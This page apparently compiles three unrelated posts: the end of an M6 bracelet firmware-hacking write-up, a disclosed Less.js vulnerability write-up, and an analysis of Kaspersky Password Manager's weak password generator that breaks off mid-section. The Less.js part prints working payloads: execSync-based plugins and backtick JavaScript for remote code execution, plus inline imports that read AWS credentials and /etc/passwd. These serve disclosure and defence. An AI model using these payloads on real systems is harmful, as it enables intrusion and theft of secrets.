Immediately after the command finishes, the M6 board should do its thing:

A love letter to the «yOu ShOuLd HaVe uSeD a 555» gang

The Capacitive Button

The touch pad in the M6 is not connected directly to the TLSR SoC, but instead passes through a driver IC on the board. I suspect the IC is responsible for managing the touch-sensing circuitry and piping a clean digital signal to the SoC, but I couldn’t easily identify the mysterious IC.

To figure out which SoC pin the button is connected to, I used a binary search approach. I first identified all GPIO pins that hadn’t been used yet and set them all up as inputs. I then checked whether any of them changed state as I touched the button; if one did, the firmware toggled the LED. Next, I split the pins under test into two groups and repeated the process, narrowing down to whichever group still reacted. It’s not very elegant, but I got to the actual pin in no time.
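The pin hunt is a binary search with a human in the loop. In this Python sketch, group_reacts is a hypothetical oracle representing one flash-and-touch round (on the bracelet, the LED toggling answers the question), and the candidate pin names are illustrative. It assumes exactly one candidate responds to the button, so about log2(n) rounds are needed.

```python
from typing import Callable, List, Sequence


def find_button_pin(pins: Sequence[str],
                    group_reacts: Callable[[List[str]], bool]) -> str:
    """Narrow candidate GPIOs down to the one wired to the button.

    group_reacts(group) is a hypothetical oracle: flash firmware that watches
    every pin in `group`, touch the button and report whether any pin changed.
    """
    candidates = list(pins)
    if not candidates or not group_reacts(candidates):
        raise RuntimeError("no candidate pin reacted to the button")
    while len(candidates) > 1:
        mid = len(candidates) // 2
        first_half = candidates[:mid]
        # Keep whichever half still reacts to the touch.
        candidates = first_half if group_reacts(first_half) else candidates[mid:]
    return candidates[0]


pins = ["PA0", "PA1", "PB6", "PC2", "PC3"]  # illustrative candidates
print(find_button_pin(pins, lambda group: "PC2" in group))  # PC2
```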

It turns out the button state can be read from the GPIO_PC2 pin. Here’s the result of running the example-programs/button firmware:

Touching the capacitive button turns the LED off

Display

The next goal is to draw something on the display. The first task is to identify the hardware. After a lot of googling and guessing, I found the exact same display on AliExpress.

It is a 13-pin, 160×80 px, color SPI TFT display. It’s a little weird that the data lines are called SDA and SCL (names usually seen on I²C devices). I believe they are, in fact, MOSI and SCLK in disguise.

Overlaid pin labels on the display connector

It uses the ST7735 driver (PDF) to push pixels to the screen. This is good news, as this driver is relatively popular among color displays. It’s featured in many maker-friendly products and supported by Adafruit’s ST7735 library. While Adafruit’s library is built on top of Arduino abstractions and we’re very far from that, it proved to be a great reference.

Next, again, the task is to figure out which SoC pins the display is connected to. Long story short:

Display pin   SoC Pin #   SoC Pin Label   Function
SDA           29          SWS/ANA_C<3>    SPI data
SCL           31          ANA_C<5>        SPI clock
RS            32          ANA_C<6>        Data/command selector (D/C# in the ST7735 datasheet)
CS            03          ANA_A<1>        SPI chip select, active low
RST           02          ANA_A<0>        Reset pin, active low
LEDK          04          ANA_A<2>        TFT backlight diode cathode; driven through an NPN transistor

To draw a single pixel on the display, we need to take the following actions:

  1. Turn on the display’s backlight by driving its LED cathode (LEDK pin)
  2. Pull RST high
  3. Set up SPI with pins SDA & SCL on the target board
  4. Send a bunch of commands to the ST7735 driver. These include:
    1. Get out of sleep mode
    2. Set up the color format (here I’m using RGB565, with 16 bits per pixel)
    3. Set up the display’s physical dimensions
    4. Turn the display on
  5. Send a command to define the drawing region
  6. Send 16 bits of color for a single pixel
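The command side of these steps can be sketched in Python as a list of (command, parameters) pairs, where the command byte is sent with RS (D/C) low and its parameters with RS high. The opcodes (SLPOUT 0x11, COLMOD 0x3A, DISPON 0x29, CASET 0x2A, RASET 0x2B, RAMWR 0x2C) come from the ST7735 datasheet. This is not the code in example-programs/display: the physical-dimensions step is left out because its values depend on the panel, the delays a real init sequence needs are omitted, and the function names are hypothetical.

```python
from typing import List, Tuple

# ST7735 command opcodes.
SLPOUT, DISPON = 0x11, 0x29
CASET, RASET, RAMWR, COLMOD = 0x2A, 0x2B, 0x2C, 0x3A

Cmd = Tuple[int, bytes]  # (command byte, parameter bytes)


def rgb565(r: int, g: int, b: int) -> int:
    """Pack 8-bit R, G, B channels into a 16-bit RGB565 value."""
    return ((r & 0xF8) << 8) | ((g & 0xFC) << 3) | (b >> 3)


def window(cmd: int, start: int, end: int) -> Cmd:
    """CASET/RASET take 16-bit big-endian start and end coordinates."""
    return (cmd, start.to_bytes(2, "big") + end.to_bytes(2, "big"))


def draw_pixel_commands(x: int, y: int, color: int) -> List[Cmd]:
    """Minimal init followed by a single-pixel write."""
    return [
        (SLPOUT, b""),                      # leave sleep mode
        (COLMOD, bytes([0x05])),            # 16 bits per pixel (RGB565)
        (DISPON, b""),                      # display on
        window(CASET, x, x),                # drawing region: one column...
        window(RASET, y, y),                # ...and one row
        (RAMWR, color.to_bytes(2, "big")),  # pixel color, high byte first
    ]


print(hex(rgb565(255, 0, 0)))  # 0xf800
```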

Getting all the details right was not an easy task. Most of the time it felt like working with a black box: there’s no feedback and the error could be anywhere, from the display identification to the pin mapping to the program logic to firmware burning errors.

Which tools did I use? Yes.

In the end, through blood, sweat and tears, it finally worked. The example-programs/display draws some color squares in the middle of the screen:

Display squares
Display pins

Drawing Text

Given we know how to draw individual pixels on the display, drawing text boils down to figuring out which pixels should be drawn for each character.

A bitmap font fits the bill perfectly. In a bitmap font, each character is just an array of bits, in which a 0 represents background and a 1 represents a pixel we need to draw.

Let’s borrow the Picopixel bitmap font from the Adafruit GFX library.

As an example, if we dig a little, we find that the letter A is 3 pixels wide by 5 pixels high and is encoded in the two bytes 0x57 0xda. We start by unrolling those bytes into their binary representation:

0x57 0xda => 0101011111011010

We know this particular character is 3 pixels wide, so we lay that bit sequence into rows, 3 bits at a time:


010
101
111
101
101

And just like magic, if we paint the 1 bits, we see the letter 'A' come up:


 #
# #
###
# #
# #

I implemented this idea in example-programs/text. It’s nice to notice that this algorithm generalizes well for scaling up text. We can target groups of 2×2, 3×3 or 4×4 pixels as if they were one single superpixel.
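The unrolling and the superpixel scaling fit in a few lines of Python. This is a sketch of the idea rather than the C code in example-programs/text; it assumes glyph bits are packed most-significant bit first, which matches the 0x57 0xda walk-through above, and the function names are hypothetical.

```python
from typing import List


def glyph_rows(data: bytes, width: int, height: int) -> List[str]:
    """Unroll a packed bitmap glyph (MSB first) into rows of '0'/'1'."""
    bits = "".join(f"{byte:08b}" for byte in data)
    if width * height > len(bits):
        raise ValueError("not enough bits for the requested glyph size")
    return [bits[r * width:(r + 1) * width] for r in range(height)]


def render(rows: List[str], scale: int = 1) -> List[str]:
    """Draw 1-bits as '#', treating each bit as a scale x scale superpixel."""
    out: List[str] = []
    for row in rows:
        line = "".join(("#" if bit == "1" else " ") * scale for bit in row)
        out += [line] * scale
    return out


for line in render(glyph_rows(bytes([0x57, 0xDA]), 3, 5)):
    print(line)
```

Calling render with scale=2 draws the same 'A' at 6×10 characters, which is the superpixel trick described above.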

A dramatic example of text drawing

Bluetooth Low Energy — Peripheral Role

To get started with BLE, I set up the TLSR8232 in peripheral mode and defined a BLE characteristic that toggles an LED when it’s written to. In example-programs/ble-services, I hooked an LED to the TX pad:

Bluetooth Low Energy Blinky

In the previous video, I’m using the nRF connect iOS app to connect to the M6 board and interact with the BLE services I defined in the firmware.

Bluetooth Low Energy — Central Role

For the grand finale, I set out to use the M6 as a BLE tracker for another project of mine: the b-parasite soil moisture/air temperature and humidity sensor.

The b-parasite broadcasts its sensor readings via BLE advertisement packets. I thought it would make an interesting demo if I could capture those broadcasts with the M6 and print the sensor values on its display.

Since we know the MAC address of the b-parasite, we can use it to filter the relevant advertisements. Once we identify a b-parasite advertisement, we look into its raw bytes to decode the sensor values:


// BLE advertisement callback. Called whenever a new advertisement
// packet comes in.
int hci_event_handle(u32 h, u8 *param, int n) {
  ...
  event_adv_report_t *p = (event_adv_report_t *)param;
  ...
  // Is this a b-parasite advertisement?
  if (p->mac[5] == 0xf0 && p->mac[4] == 0xca && p->mac[3] == 0xf0 &&
      p->mac[2] == 0xca && p->mac[1] == 0x00 && p->mac[0] == 0x08) {
    ...
    // Decode sensor values from the advertisement payload.
    b_parasite_adv_t bp_data;
    bp_data.counter = p->data[8];
    bp_data.battery_millivoltage = p->data[9] << 8 | p->data[10];
    bp_data.temp_millicelcius = p->data[11] << 8 | p->data[12];
    bp_data.air_humidity = p->data[13] << 8 | p->data[14];
    bp_data.soil_moisture = p->data[15] << 8 | p->data[16];

    // Draw values on the display.
    draw_parasite_data(&bp_data);
    ...
  }
  ...
}
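To test the decoding logic off-device, the byte offsets from the handler above can be mirrored in Python. This is a hypothetical host-side helper, not part of the repository: it follows the C code in treating every 16-bit field as unsigned big-endian, reuses the field names of the C struct, and the sample payload is made-up data.

```python
from dataclasses import dataclass
from typing import Optional

# Hypothetical constant: the handler compares p->mac[5] .. p->mac[0] with
# f0 ca f0 ca 00 08, so the address bytes arrive last-byte-first.
B_PARASITE_MAC = bytes([0xF0, 0xCA, 0xF0, 0xCA, 0x00, 0x08])


@dataclass
class BParasiteAdv:
    counter: int
    battery_millivoltage: int
    temp_millicelcius: int
    air_humidity: int
    soil_moisture: int


def be16(data: bytes, offset: int) -> int:
    """Unsigned big-endian 16-bit read: data[offset] << 8 | data[offset + 1]."""
    return data[offset] << 8 | data[offset + 1]


def parse_adv(mac: bytes, data: bytes) -> Optional[BParasiteAdv]:
    """Hypothetical helper: decode a b-parasite advertisement, or return None."""
    if bytes(reversed(mac)) != B_PARASITE_MAC:
        return None
    return BParasiteAdv(
        counter=data[8],
        battery_millivoltage=be16(data, 9),
        temp_millicelcius=be16(data, 11),
        air_humidity=be16(data, 13),
        soil_moisture=be16(data, 15),
    )


# Made-up sample: MAC in received order (mac[0] first) and a 17-byte payload.
sample_mac = bytes([0x08, 0x00, 0xCA, 0xF0, 0xCA, 0xF0])
sample_data = bytes(8) + bytes([7, 0x0B, 0xB8, 0x5D, 0xC0, 0x80, 0x00, 0x40, 0x00])
print(parse_adv(sample_mac, sample_data))
```

With the made-up sample, this decodes a battery voltage of 3000 mV and a temperature of 24000 m°C; any other MAC address yields None.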

The full code for the demo is in example-programs/ble-b-parasite-tracker. Here’s the result:

Bluetooth Low Energy & b-parasite

Final Words

If you made it this far, thanks for reading. I hope you enjoyed it. As much as it is a lot of fun, writing posts like this takes a lot of time and effort. If you want to show your support, consider following me on Twitter.

EXPLOITING LESS.JS TO ACHIEVE RCE


Original text by Jeremy Buis

Introduction

Less (less.js) is a preprocessor language that transpiles to valid CSS code. It offers functionality to help ease the writing of CSS for websites. 

According to StateofCss.org in their 2020 survey, Less.js was the second most popular preprocessor in terms of usage.

State of CSS - Less.js in ranking of usage
Less popularity sorted by usage in 2020

While performing a pentest for one of our Penetration Testing as a Service (PTaaS) clients, we found an application feature that enabled users to create visualizations which allowed custom styling. One of the visualizations allowed users to input valid Less code, which was transpiled on the client-side to CSS. 

This looked like a place that needed a closer look. 

Less has some interesting features, especially from a security perspective. Versions of Less before 3.0.0 allow the inclusion of JavaScript by default through the backtick operator. The following is considered valid Less code:


@bodyColor: `red`;
body {
  color: @bodyColor;
}


Which will output:


body {
  color: red;
}


Inline JavaScript evaluation was documented as far back as 2014, as an archived copy of the Less website shows near the header “JavaScript Evaluation” (reference 1).

JavaScript Evaluation

Standing on the shoulders of giants

RedTeam Pentesting documented the inline JavaScript backtick behaviour as a security risk in an advisory released in 2016 (reference 2). They warned that it could lead to RCE in certain circumstances. The following is a working proof of concept from their excellent blog post (reference 3):


$ cat cmd.less
@cmd: `global.process.mainModule.require("child_process").execSync("id")`;
.redteam { cmd: "@{cmd}" }


As a result, Less versions 3.0.0 and newer disallow inline JavaScript via backticks by default; it can be re-enabled with the option {javascriptEnabled: true}.

Next, we return to our PTaaS client test, where the Less version was older than 3.0.0 and the code was transpiled on the client side, so inline JavaScript execution was allowed by default. This resulted in a nice DOM-based stored cross-site scripting vulnerability with a payload like the following:


body {
color: `alert('xss')`;
}


Once the Less code is transpiled, the payload above pops an alert box, confirming that the XSS was successful.

This was a great find for our client, but wasn’t enough to scratch our itch. We started probing the rest of the available features to see if there was any other dangerous behaviour that could be exploited.

The bugs

Import (inline) Syntax

The first bug is a result of the enhanced import feature of Less.js, which contains an inline mode that doesn’t interpret the requested content. This can be used to request local or remote text content and return it in the resulting CSS. 

In addition, the Less processor accepts URLs and local file references in its @import statements without restriction. This can be used for SSRF and local file disclosure when the Less code is processed on the server side. The following steps first demonstrate a potential local file disclosure, followed by an SSRF vulnerability.

Local file disclosure PoC

1. Create a Less file like the following:


// File: bad.less
@import (inline) "../../.aws/credentials";


2. Launch the lessc command against your Less file


Less $ lessc bad.less


3. Notice the output contains the referenced file


Lessjs $ .\node_modules\.bin\lessc .\bad.less
[default]
  aws_access_key_id=[MASKED]
  aws_secret_access_key=[MASKED]


SSRF PoC

1. Start a web server on localhost serving a Hello World message

2. Create a Less file like the following:


// File: bad.less
@import (inline) "http://localhost/";

3. Launch the lessc command against your Less file and notice that the output contains the referenced external content


Lessjs $ .\node_modules\.bin\lessc .\bad.less
Hello World

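When Less is compiled on the server side, one way to narrow both PoCs above is to vet @import targets before the file reaches the compiler. The Python sketch below is a hypothetical pre-check, not a Less.js feature: it assumes all legitimate imports are relative paths under a known base directory (the /srv/styles path is made up), rejects anything carrying a URL scheme, and refuses paths that resolve outside the base directory. Extracting the targets from the Less source is left out.

```python
from pathlib import Path
from urllib.parse import urlparse


def is_safe_import(target: str, base_dir: str) -> bool:
    """Hypothetical policy: allow only relative imports that stay inside base_dir."""
    # Anything with a scheme (http:, https:, file:, ...) is refused: this covers the SSRF PoC.
    if urlparse(target).scheme:
        return False
    base = Path(base_dir).resolve()
    # Joining an absolute path such as "/etc/passwd" discards base, and resolve()
    # collapses ".." segments, so both escape routes land outside base.
    resolved = (base / target).resolve()
    return resolved.is_relative_to(base)  # Path.is_relative_to needs Python 3.9+


for target in ("theme/colors.less", "../../.aws/credentials", "/etc/passwd", "http://localhost/"):
    print(target, is_safe_import(target, "/srv/styles"))
```

Only the first target passes. A check like this complements, rather than replaces, running the compiler with minimal privileges.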

Plugins

The Less.js library supports plugins which can be included directly in the Less code from a remote source using the @plugin syntax. Plugins are written in JavaScript and when the Less code is interpreted, any included plugins will execute. This can lead to two outcomes depending on the context of the Less processor. If the Less code is processed on the client side, it leads to cross-site scripting. If the Less code is processed on the server-side, it leads to remote code execution. All versions of Less that support the @plugin syntax are vulnerable.

The following two snippets show example Less.js plugins.

Version 2:


// plugin-2.7.js
functions.add('cmd', function(val) {
  return val;
});


Version 3 and up:


// plugin-3.11.js
module.exports = {
  install: function(less, pluginManager, functions) {
    functions.add('ident', function(val) {
      return val;
    });
  }
};


Both of these can be included in the Less code in the following way and can even be fetched from a remote host:


// example local plugin usage
@plugin "plugin-2.7.js";


or


// example remote plugin usage
@plugin "http://example.com/plugin-2.7.js";


The following example snippet shows how an XSS attack could be carried out:


window.alert('xss')
functions.add('cmd', function(val) {
  return val;
});


Plugins are even more dangerous when the Less code is transpiled on the server side. The next two examples target version 2.7.3.

The following plugin snippet (v2.7.3) shows how an attacker might achieve remote code execution (RCE):


functions.add('cmd', function(val) {
  return `"${global.process.mainModule.require('child_process').execSync(val.value)}"`;
});


And here is the malicious Less code that includes the plugin:


@plugin "plugin.js";

body {
color: cmd('whoami');
}

Notice the output when the Less code is transpiled using lessc.

Lessjs Local RCE

The following is the equivalent PoC plugin for version 3.13.1:


//Vulnerable plugin (3.13.1)
registerPlugin({
    install: function(less, pluginManager, functions) {
        functions.add('cmd', function(val) {
            return global.process.mainModule.require('child_process').execSync(val.value).toString();
        });
    }
})


The malicious Less code is the same for all versions. All versions of Less.js that support plugins can be exploited using one of the PoCs above.
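Every bug above hinges on three language features: backtick JavaScript evaluation, @plugin, and @import pulling in URLs or inline content. A service compiling untrusted Less could refuse input that uses them. The regex-based Python check below is a hypothetical, deliberately blunt sketch (the pattern list is an assumption, and a backtick inside a comment is rejected too); it is not a complete sanitizer and is not a substitute for isolating the compiler.

```python
import re

# Hypothetical deny-list for the features abused in this article.
DANGEROUS_PATTERNS = {
    "inline JavaScript (backticks)": re.compile(r"`"),
    "@plugin directive": re.compile(r"@plugin\b", re.IGNORECASE),
    "@import of a URL": re.compile(
        r"@import\s*(\([^)]*\))?\s*(url\(\s*)?[\"']?[a-z][a-z0-9+.-]*://",
        re.IGNORECASE,
    ),
    "@import (inline)": re.compile(r"@import\s*\([^)]*\binline\b[^)]*\)", re.IGNORECASE),
}


def find_dangerous_features(less_source: str) -> list[str]:
    """Return the names of the risky features found in untrusted Less source."""
    return [name for name, pattern in DANGEROUS_PATTERNS.items()
            if pattern.search(less_source)]


untrusted = '@plugin "plugin.js";\nbody { color: cmd(\'whoami\'); }'
print(find_dangerous_features(untrusted))  # ['@plugin directive']
```

An empty result means none of the listed constructs was found; anything else would be rejected before compilation.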

Real-world example: CodePen.io

CodePen.io is a popular website for creating web code snippets, and supports the standard languages plus others like Less.js. Since CodePen.io accepts security reports from the community, we tried the proofs of concept above to check the results of our research.

As a result, we found that it was possible to perform the above attack using plugins against their website. We were able to leak their AWS secret keys and run arbitrary commands inside their AWS Lambdas.

The following shows reading a local file (/etc/passwd) using the local file inclusion bug.


// import local file PoC
@import (inline) "/etc/passwd";



root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...snip...
ec2-user:x:1000:1000:EC2 Default User:/home/ec2-user:/bin/bash
rngd:x:996:994:Random Number Generator Daemon:/var/lib/rngd:/sbin/nologin
slicer:x:995:992::/tmp:/sbin/nologin
sb_logger:x:994:991::/tmp:/sbin/nologin
sbx_user1051:x:993:990::/home/sbx_user1051:/sbin/nologin
sbx_user1052:x:992:989::/home/sbx_user1052:/sbin/nologin
...snip...


The next screenshot shows using the Less plugin feature to gain RCE.

less-plugin-rce
Less RCE PoC in action

We responsibly disclosed the issue, and CodePen.io quickly fixed it.

References

  1. http://web.archive.org/web/20140202171923/http://www.lesscss.org/
  2. Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler
  3. Executing JavaScript In The LESS CSS Precompiler
  4. Features In-Depth | Less.js

Kaspersky Password Manager: All your passwords are belong to us


Original text by Jean-Baptiste Bédrune

tl;dr: The password generator included in Kaspersky Password Manager had several problems. The most critical one is that it used a PRNG not suited for cryptographic purposes. Its single source of entropy was the current time. All the passwords it created could be bruteforced in seconds. This article explains how to securely generate passwords, why Kaspersky Password Manager failed, and how to exploit this flaw. It also provides a proof of concept to test if your version is vulnerable.

The product has been updated and its newest versions aren’t affected by this issue.

Introduction

Two years ago, we looked at Kaspersky Password Manager (KPM), a password manager developed by Kaspersky. Kaspersky Password Manager securely stores passwords and documents in an encrypted vault protected by a master password, so, as with other password managers, users only have to remember a single password to use and manage all their passwords. The product is available for various operating systems (Windows, macOS, Android, iOS, Web…). Encrypted data can then be automatically synchronized between all your devices, always protected by your master password.

The main functionality of KPM is password management. One key point with password managers is that, unlike humans, these tools are good at generating random, strong passwords. To generate secure passwords, Kaspersky Password Manager must rely on a secure password generation mechanism. We will first look at an example of a good password generation method, then explain why the method used by Kaspersky was flawed and how we exploited it. As we will see, passwords generated by this tool can be bruteforced in seconds.

After a little less than two years, this vulnerability has been patched in all versions of KPM. It has been assigned CVE-2020-27020.

Generating robust passwords from a charset

For the sake of simplicity, let's study how passwords are generated in KeePass, an open source project. Password generation is implemented in various classes in the KeePassLib.Cryptography.PasswordGenerator namespace. KeePass provides 3 methods to generate a password: a charset-based, a pattern-based and a custom generation method.

The simplest method is the charset-based generator, which creates a password from a given charset. Let's see how it works. Here is the main loop responsible for the password generation:


PwCharSet pcs = new PwCharSet(pwProfile.CharSet.ToString());
if(!PwGenerator.PrepareCharSet(pcs, pwProfile))
    return PwgError.InvalidCharSet;

char[] v = new char[pwProfile.Length];
try
{
    for(int i = 0; i < v.Length; ++i)
    {
        char ch = PwGenerator.GenerateCharacter(pcs, crsRandomSource);
        if(ch == char.MinValue)
            return PwgError.TooFewCharacters;

        v[i] = ch;
        if(pwProfile.NoRepeatingCharacters) pcs.Remove(ch);
    }
    ...
}

The GenerateCharacter method is called to generate every single character of the password. It takes a charset and a random source, and outputs a random character from the charset. Its implementation is rather straightforward:


internal static char GenerateCharacter(PwCharSet pwCharSet,
                                       CryptoRandomStream crsRandomSource)
{
    uint cc = pwCharSet.Size;
    if(cc == 0) return char.MinValue;

    uint i = (uint)crsRandomSource.GetRandomUInt64(cc);
    return pwCharSet[i];
}

Finally, GetRandomUInt64 is a uniform random number generator that outputs values between 0 and cc - 1:


internal ulong GetRandomUInt64(ulong uMaxExcl)
{
    if(uMaxExcl == 0) { Debug.Assert(false); throw new ArgumentOutOfRangeException("uMaxExcl"); }

    ulong uGen, uRem;
    do
    {
        uGen = GetRandomUInt64();
        uRem = uGen % uMaxExcl;
    }
    while((uGen - uRem) > (ulong.MaxValue - (uMaxExcl - 1UL)));
    // This ensures that the last number of the block (i.e.
    // (uGen - uRem) + (uMaxExcl - 1)) is generatable;
    // for signed longs, overflow to negative number:
    // while((uGen - uRem) + (uMaxExcl - 1) < 0);

    return uRem;
}

What is important here is that each character is generated independently from the other ones: every character is random, and knowing which character has been generated before does not give us information about the next char that will be generated.
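For comparison, the same charset-based approach takes only a few lines in Python. This is not KeePass code: it swaps KeePass's CryptoRandomStream for Python's secrets module (which draws from the operating system CSPRNG and picks uniformly), and generate_password with its parameters is a hypothetical function mirroring pwProfile.Length and NoRepeatingCharacters.

```python
import secrets
import string


def generate_password(charset: str, length: int, no_repeating: bool = False) -> str:
    """Hypothetical generator: pick each character independently and uniformly."""
    pool = list(dict.fromkeys(charset))  # drop duplicate characters, keep order
    chars = []
    for _ in range(length):
        if not pool:
            # Same situation as KeePass's PwgError.TooFewCharacters.
            raise ValueError("too few characters to build the password")
        ch = secrets.choice(pool)  # uniform draw backed by the OS CSPRNG
        chars.append(ch)
        if no_repeating:
            pool.remove(ch)  # like pcs.Remove(ch) when NoRepeatingCharacters is set
    return "".join(chars)


print(generate_password(string.ascii_letters + string.digits + "!#$%&*+-=?@", 12))
```

As in the KeePass loop, no character depends on the ones generated before it (apart from the optional no-repeat rule).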

Now, let's assume the parameterless GetRandomUInt64 is cryptographically strong and generates a random 64-bit number. Why is there a loop here, and why is this function not simply implemented as return GetRandomUInt64() % uMaxExcl;?

Uniform random number generation

This loop is essential to uniformly generate numbers in a range.

Imagine you want to get a random char from a charset of 10 possible chars, and you have a random number generator method GetRandom32 which outputs numbers between 0 and 32 (32 excluded). The straightforward way to output such a char would be:


const string charset = "0123456789";
return charset[GetRandom32() % 10];

Let’s see how characters are generated:

  • “4” is returned if GetRandom32() returns 4, 14 or 24 (3 possible values)
  • “5” is returned if GetRandom32() returns 5, 15 or 25 (3 possible values)
  • But “1” is returned if GetRandom32() returns 1, 11, 21 or 31 (4 possible values!)

The distribution is given below:

Distribution of GetRandom32() mod 10

So this method is biased: as one can see from the outputs, digits 0 and 1 will be output more frequently than the other ones. This is commonly called the “modulo bias”. See the excellent Definitive guide to “modulo bias” and how to avoid it, by Kudelski Security, for more information.
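The counts can be checked by brute force. The short Python sketch below enumerates all 32 outputs of the hypothetical 5-bit GetRandom32 and tallies which digit each one selects through the modulo.

```python
from collections import Counter

# Every possible output of a 5-bit generator (0..31), reduced modulo 10,
# exactly like charset[GetRandom32() % 10].
counts = Counter(value % 10 for value in range(32))

for digit in range(10):
    print(digit, counts[digit])
```

It prints 4 for digits 0 and 1 and 3 for every other digit, i.e. 4/32 = 12.5% versus 3/32 ≈ 9.4%.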

To remove this “modulo bias”, a common method is to discard all the numbers greater than or equal to 30 (the biggest multiple of 10 lower than 32):


const string charset = "0123456789";
uint uGen;
do {
    uGen = GetRandom32();
} while (uGen >= 30);  // reject 30 and 31 so every digit keeps exactly 3 preimages
return charset[(int)(uGen % 10)];

This is exactly what KeePass does, though even without the loop the bias in KeePass would be much less significant than in this example, because GetRandomUInt64 generates values much bigger than the size of the password character set.

We saw how to uniformly select a character from a given range of characters, assuming our random source is uniform. Let’s see now what kind of source is suitable to generate cryptographically strong random numbers.

Cryptographically secure PRNG

Generated numbers must be random. But what does that mean exactly? An ordinary good PRNG will pass a series of tests, mainly statistical randomness tests such as Diehard or Dieharder tests.

A cryptographically secure PRNG (CSPRNG) will also pass those tests, but it also has two other requirements:

  • It must satisfy the next-bit test: knowing all the bits already generated by a CSPRNG, there is no polynomial-time method that will predict the next bit with a probability non-negligibly higher than 0.5.
  • If, at any moment, the whole state of the CSPRNG is compromised, there is no way to retrieve the bits previously returned by the CSPRNG.

These points are essential for password generation. For example, if a password has been compromised for some reason, and if a non-CSPRNG has been used to generate this password, an attacker could then be able to retrieve the other passwords generated using this PRNG. Most operating systems provide CSPRNG implementations: CryptGenRandom on Windows, or /dev/random on UNIX-like operating systems.

Some software prefers to use its own implementation, often seeded, fully or partially, by the operating system PRNG. KeePass uses two PRNGs, based on Salsa20 and ChaCha20, and a legacy one based on a variant of ARCFour. Let's assume the first two PRNGs are cryptographically secure: we now have all the elements to generate random, secure passwords from a given charset.

Kaspersky’s Password Generation Method

Kaspersky Password Manager has a built-in password generator, which creates passwords from a given “policy”. The policy settings are simple: password length, uppercase letters, lowercase letters, digits, and a custom set of special chars. All these settings can be configured in the Password generator interface, as shown here (this is the standard setting):

KPM Password Generator

By default, KPM generates 12-character passwords with an extended charset.

Tricking the frequency of appearance

The generation procedure is much more complex than the KeePass method. KPM first picks two random floats r1 and r2 between 0 and 1, and multiplies their product by the length of the password charset to pick a position in the charset table:


import random

def pick_char(charset):
    # charset: the (reordered) character set to use
    r1 = random.random()
    r2 = random.random()
    pos = int(r1 * r2 * len(charset))  # truncate to an index; r1 * r2 < 1 keeps it in range
    return charset[pos]

The distribution of r1 × r2 is (thanks to MathWorld):

$$
\begin{aligned}
P[r_1 r_2 = a] &= \int_0^1 \int_0^1 \delta(xy - a)\,dy\,dx \\
&= \int_0^1 \int_{-a}^{x-a} \delta(z)\,\frac{1}{x}\,dz\,dx \\
&= \int_0^1 \mathbf{1}(x \ge a)\,\frac{1}{x}\,dx \\
&= \int_a^1 \frac{1}{x}\,dx \\
&= -\ln(a)
\end{aligned}
$$

Let’s plot it:

Uniform product distribution

The distribution is not uniform: lower positions are more likely to occur than positions near the end of the charset (values of r1 × r2 close to 1). This method is quite puzzling, but it seems to be exactly what KPM intended to implement.
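Integrating the density -ln(t) from 0 to a gives the cumulative distribution P[r1 × r2 ≤ a] = a - a·ln(a), which a quick simulation can confirm. The Python sketch below uses random.random() as a stand-in for KPM's PRNG and an assumed 26-letter charset; it also measures how skewed the resulting charset positions are.

```python
import math
import random


def product_cdf(a: float) -> float:
    """P[r1 * r2 <= a] for independent uniform r1, r2: the integral of -ln(t) from 0 to a."""
    return a - a * math.log(a)


rng = random.Random(2021)  # fixed seed, only to make the run reproducible
samples = [rng.random() * rng.random() for _ in range(200_000)]

for a in (0.1, 0.25, 0.5):
    empirical = sum(s <= a for s in samples) / len(samples)
    print(f"a={a}: simulated {empirical:.3f}, formula {product_cdf(a):.3f}")

# Charset positions as in pos = int(r1 * r2 * len(charset)), for an assumed 26-letter charset.
charset_len = 26
positions = [int(s * charset_len) for s in samples]
first = positions.count(0) / len(positions)
last = positions.count(charset_len - 1) / len(positions)
print(f"first position: {first:.1%}, last position: {last:.2%}")
```

Analytically, the first position is picked with probability product_cdf(1/26) ≈ 16.4% and the last with about 0.075%, compared with 1/26 ≈ 3.8% for a uniform pick.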

How is the charset built? Is it fully ordered, like “abcdefghij…”? No…

  • For the first three chars, the charset is fully ordered (almost… we will see that later).
  • Then, for the next chars, KPM relies on letter frequency: it assumes the least frequent letters (in some language) should appear more often in the generated password. The supposed frequency of appearance of each letter, as used in KPM, is shown in the graph below:
Passwords letter frequency

The charset is then ordered according to the inverse frequency of appearance of each letter: q, x, z, w… n, a, e.

As lower values are more likely to appear given the distribution function, we can assume some chars like “q” and “x” are much more likely to appear in passwords generated by KPM.

If these statistics were used independently to generate every char of a password, we would often see several “q”, “x” or “z” in the passwords. However, things are more complex: the chars already generated are taken into account when computing the frequencies of appearance. If a “z” is generated, then the probability of appearance of “z” in the frequency table is strongly increased. Once the charset is ordered according to this table, “z” will be at the end of the table, and will have much less chance of being picked.

Variation of the probability of appearance of each letter

These changes also affect other letters: after “z” has been picked, the probability of “a”, “e”, “m”, “q”, “s” and “x” has also increased. On the contrary, “h” has decreased. But, after “h” is picked, its probability of appearance will then increase a lot.

Our hypothesis is that this method was implemented to trick standard password cracking tools. Password crackers such as Hashcat or John the Ripper try the most probable passwords first, i.e. passwords generated by humans. Their cracking methods rely on the fact that a password created by a human is more likely to contain “e” and “a” than “x” or “j”, or that the bigrams “th” and “he” will appear much more often than “qx” or “zr”.

Dedicated techniques such as Markov generators, which assume that there is a hidden Markov model in the way humans generate passwords, can directly exploit these human habits (see Fast Dictionary Attacks on Passwords Using Time-Space Tradeoff for more details).

Hence, passwords generated by KPM will be, on average, far in the list of candidate passwords tested by these tools. If an attacker tries to crack a list of passwords generated by KPM, he will probably wait quite a long time until the first one is found. This is quite clever.

However, if an attacker knows that a password has been generated by KPM, he can adapt his tool to take into account the model followed by KPM. As these passwords are, in a certain sense, biased (to tackle password crackers), this bias can be used to generate the most probable passwords produced by this tool, and test them first. A straightforward way to do it could be to use a Markov generator, such as the one provided by John the Ripper (this method has not been tested).

We can conclude that the generation algorithm in itself is not that bad: it will resist standard tools. However, if an attacker knows a person uses KPM, he will be able to break that person's password much more easily than a fully random password. Our recommendation is to generate random passwords long enough that no tool can break them.

We previously saw that KPM picked two random values r1 and r2 to compute an index in the charset table. Let's now see how these values are computed.

KPM’s Random Number Generator

These two values come directly from the KPM PRNG. This PRNG outputs uniformly distributed floats between 0 and 1, 1 excluded.

The PRNG used differs in the Desktop and the Web version:

